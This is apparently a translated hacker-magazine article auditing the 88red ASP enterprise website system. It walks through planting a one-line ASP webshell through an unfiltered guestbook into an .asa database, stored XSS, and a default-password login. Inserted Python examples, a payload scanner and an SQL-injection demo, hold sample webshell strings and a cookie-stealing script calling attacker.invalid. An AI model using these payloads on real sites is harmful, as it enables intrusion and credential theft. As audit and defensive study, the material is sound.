Author: Xiao Shuai (xsser) @ [0.s.t]
This article was published in issue 4 of Hacker Handbook (黑客手册). If you reproduce it, please credit the source or link to it: Http://blog.0kee.com/xiaoshuai (Xiao Shuai's blog)
It has been a long time since I wandered over to asp300, and I felt I owed something to the traffic that release site sends, and to the many Hacker Handbook readers who keep asking for more (don't throw eggs! Throw money!). Having bragged that much, I had to risk my neck and actually read some code. When I downloaded this system it looked great, and it brags even harder than I do. Here is what it says about itself: "88red HTML static page generating enterprise website system V3.0, carefully crafted and now formally released, brings together a site map, corporate news center, enterprise products, search, customer messages, downloads, a voting system and so on, covering basically every basic function an enterprise website needs. Its static page generation is the greatest help to the many corporate websites doing search engine optimization (SEO). The system also has a freshly designed look that is closer to what corporate websites want." Let the facts speak.

1. The message board is not filtered

Opening the directory I found conn.asp, config.asp and the other usual files, so let's look at them. config.asp has nothing special. Does conn.asp have error handling (that is, does it guard against database path disclosure, 暴库)? Let's take a look at conn.asp:
<%
On Error Resume Next                ' swallows errors, so a failed open does not leak the database path
Dim conn
Dim connstr
Dim db
db = "Data/qiyedata.asa"            ' the Access database is stored with an .asa extension
Set conn = Server.CreateObject("ADODB.Connection")
connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open connstr
%>
Following the vine to the melon: touch around and see what turns up. What I felt was the database, and it is an .asa file. The first thing that came to mind was the one-sentence trojan (一句话木马). But what can a one-liner be connected to, and how do I get it stored in the database? Through users, messages, publishing and places like that. Then I looked at the root directory: everything is static. HTML injection, maybe? I set that idea aside for now and looked at the messages, and the messages are static too. Alas! Fine, carry on. The root directory has a file called savegb.asp, which is obviously the file that saves messages, so let's see what it filters. The fragment is as follows:
If Request.Form("code") = "" Then          ' verification code is empty
    Response.Write "<script language=javascript>alert('Please fill in your name');this.location.href='javascript:history.go(-1)';</script>"
    Response.End
End If
If Request.Form("content") = "" Then       ' no message content: you lose your right to speak
    Response.Write "<script language=javascript>alert('Please fill in the message content');this.location.href='javascript:history.go(-1)';</script>"
    Response.End
End If
Set rs = Server.CreateObject("Adodb.Recordset")   ' meet the two checks above and you get to the database
sql = "SELECT * FROM GB"
rs.Open sql, conn, 3, 3
Alas! The head of the file just includes conn.asp, and nothing is blocked or filtered, which gives two results. First, write a one-sentence trojan straight in and get a shell. Second, cross-site scripting. Start with the one-liner (provided the database itself does not block it), as shown in Figure 1:
[Figure 1]
Then we click "Submit", and our one-liner is written into the .asa database. I am running the Xiaoxuanfeng (小旋风) ASP server, which does not parse .asa files, so I renamed it .asp, but the principle is the same. Look at Figure 2:
[Figure 2]
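An added example, not code from the article or from the 88red system: a Python scanner that does what a responder would do with a file like Data/qiyedata.asa, flag a database served under an IIS script extension and look inside it for stored one-sentence trojans and <script> payloads. The sample bytes are constructed here, not taken from any real database; the extension list is the default IIS 5/6 ASP script map; and because Access text fields may be stored either as single-byte (Unicode-compressed) or as UTF-16LE text, each signature is searched in both encodings. Whether the ASP engine actually runs a stored tag depends on how the field bytes land in the file, which is why every hit reports its encoding.

```python
"""Scan an Access/Jet database for stored web payloads and decide whether
IIS would execute the file. Added example; not from the article or 88red."""
import re
from pathlib import Path

# Default IIS 5/6 script map for asp.dll: a database saved under one of these
# names (the article's Data/qiyedata.asa) is run through the ASP engine.
SCRIPT_EXTENSIONS = {".asp", ".asa", ".cer", ".cdx"}

# (kind, opening literal, closing literal) of the payloads the article stores
# through the unfiltered guestbook.
SIGNATURES = [
    ("asp", "<%", "%>"),                        # one-sentence trojan, e.g. <%eval request("x")%>
    ("html-script", "<script", "</script>"),    # stored XSS
]
# Access text may be single-byte (Unicode-compressed) or UTF-16LE.
ENCODINGS = ("ascii", "utf-16-le")

# Calls that turn a stored ASP tag into a shell.
SHELL_CALL = re.compile(r"\b(eval|execute|executeglobal)\b", re.I)


def served_as_script(path):
    """True if IIS would hand this file name to the ASP engine."""
    return Path(path).suffix.lower() in SCRIPT_EXTENSIONS


def tag_pattern(open_lit, close_lit, encoding):
    """Lazy open...close byte regex for one literal pair in one encoding."""
    start = re.escape(open_lit.encode(encoding))
    end = re.escape(close_lit.encode(encoding))
    return re.compile(start + b".*?" + end, re.S | re.I)


def find_stored_payloads(blob):
    """Return (offset, encoding, kind, text) for every signature hit, by offset."""
    hits = []
    for kind, open_lit, close_lit in SIGNATURES:
        for enc in ENCODINGS:
            for m in tag_pattern(open_lit, close_lit, enc).finditer(blob):
                text = m.group(0).decode(enc, errors="replace")
                hits.append((m.start(), enc, kind, text))
    return sorted(hits)


def assess(path, blob):
    """Classify a database file by its name and its content."""
    hits = find_stored_payloads(blob)
    shells = [h for h in hits if h[2] == "asp" and SHELL_CALL.search(h[3])]
    xss = [h for h in hits if h[2] == "html-script"]
    exposed = served_as_script(path)
    findings = []
    if exposed:
        findings.append("script-extension-database")
    if shells:
        findings.append("webshell" if exposed else "asp-payload-stored")
    if xss:
        findings.append("stored-xss")
    return findings, hits


# Constructed stand-in for a tampered qiyedata.asa: the Jet header magic, one
# benign guestbook row, then payloads in both storage encodings (hypothetical data).
SAMPLE_BLOB = (
    b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 32
    + b"Hello, nice site!" + b"\x00" * 8
    + b'<%eval request("cmd")%>' + b"\x00" * 8
    + "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>".encode("utf-16-le")
    + b"\x00" * 8
    + '<%Execute(Request("a"))%>'.encode("utf-16-le")
)

if __name__ == "__main__":
    findings, hits = assess("Data/qiyedata.asa", SAMPLE_BLOB)
    print("findings:", findings)
    for offset, enc, kind, text in hits:
        print(f"  0x{offset:04x} {enc:9s} {kind:12s} {text}")
```

Run it against a copy of the database pulled from the web root; a hit of kind "asp" in a file whose name is in the script map is the condition the article exploits, while the same hit in a .mdb only tells you the guestbook has been tampered with.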
That is how we get a one-liner into the database; privilege escalation comes after that. Second, let's look at XSS. With XSS one immediately asks whether there is a way to get a webshell, for example by riding the administrator's session. Cross-site scripting to a webshell has already been written up by an expert, so let's look at the back end and its login verification. At least our universal password (万能密码) is no longer almighty. The fragment is as follows:
theadmin = Replace(Request("User"), "'", "")         ' removes single quotes from the user name
pass = Replace(Trim(Request("Pass")), "'", "")       ' trims spaces and removes single quotes, same as above
Set rs = Server.CreateObject("Adodb.Recordset")
sql = "select * from Admin Where admname='" & theadmin & "'"   ' then on to the database query
rs.Open sql, conn, 1, 3
If rs.EOF Then
    Response.Write "<script language='JavaScript'>alert('Sorry, this user does not exist!');window.location.href='login.asp';</script>"
    Response.End
Else
    pass1 = rs("Admpass")
    If pass1 = Md5(pass) Then                        ' Md5() is the system's own included hash function
        Session("admin") = rs("Admname")
        Response.Redirect "main.asp"
    Else
        Response.Write "<script language='JavaScript'>alert('Sorry, bad password!');window.location.href='login.asp';</script>"
    End If
End If
rs.Close
Set rs = Nothing
conn.Close
Set conn = Nothing
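To show concretely why the quote stripping in this login blocks the universal-password route, here is an added example (not from the article or the 88red system) that rebuilds the login lookup in Python against an in-memory SQLite table standing in for the Access Admin table. It assumes the site's Md5() returns the same 32-character lowercase hex as hashlib, and because SQLite and Jet SQL differ in details it uses the classic ' or '1'='1 payload that both accept. The unfiltered and quote-stripped versions sit beside a parameterized one, which is the proper fix rather than character filtering.

```python
"""The article's login lookup with and without its single-quote filter, beside a
parameterized version. Added example; not from the article or 88red. SQLite
stands in for Access; Md5() is assumed to match hashlib's lowercase hex."""
import hashlib
import sqlite3


def md5_hex(password):
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def setup_db():
    """In-memory stand-in for the Admin table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Admin (admname TEXT, admpass TEXT)")
    conn.execute("INSERT INTO Admin VALUES (?, ?)", ("admin", md5_hex("s3cret")))
    conn.commit()
    return conn


def strip_quotes(value):
    """The page's Replace(Request("User"), "'", "")."""
    return value.replace("'", "")


def lookup_unfiltered(conn, user):
    """The query exactly as the page concatenates it, but without the filter."""
    sql = "SELECT admname, admpass FROM Admin WHERE admname='" + user + "'"
    return conn.execute(sql).fetchall()


def lookup_page_style(conn, user):
    """What the login fragment actually does: strip quotes, then concatenate."""
    return lookup_unfiltered(conn, strip_quotes(user))


def lookup_parameterized(conn, user):
    """The proper fix: the user name never becomes part of the SQL text."""
    sql = "SELECT admname, admpass FROM Admin WHERE admname=?"
    return conn.execute(sql, (user,)).fetchall()


def login_page_style(conn, user, password):
    """Mirror of the page's flow: row lookup, then the Pass1 = Md5(pass) comparison."""
    rows = lookup_page_style(conn, user)
    if not rows:
        return False                      # "Sorry, this user does not exist!"
    # Trim() then Replace() on the password, as in the fragment
    return rows[0][1] == md5_hex(strip_quotes(password.strip()))


if __name__ == "__main__":
    db = setup_db()
    universal = "' or '1'='1"             # the classic 万能密码 user name
    print("unfiltered:", lookup_unfiltered(db, universal))        # admin row comes back
    print("page style:", lookup_page_style(db, universal))        # quotes gone: no row
    print("parameterized:", lookup_parameterized(db, universal))  # no row
    print("login admin/s3cret:", login_page_style(db, "admin", "s3cret"))
```

With the filter in place the payload degenerates to the literal user name " or 1=1", which matches no row, and even a matching user name still has to pass the hash comparison; the parameterized version gets the same result without depending on which characters were stripped.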
No luck: the single-quote filter chokes off that route into the back end. Let me tidy up the train of thought so far so it is easy to follow: message filtering is lax -> XSS -> back-end verification is solid, cannot get in -> look at the file header and read the configuration file.

2. Exploiting the holes

(1) Following the vine to a webshell. We use the default password to log in to the back end. Call it white-box or black-box testing, a tester who gets to a webshell is a good tester. Enough nonsense; the editor docks fees for padding. Look at Figure 3:
[Figure 3]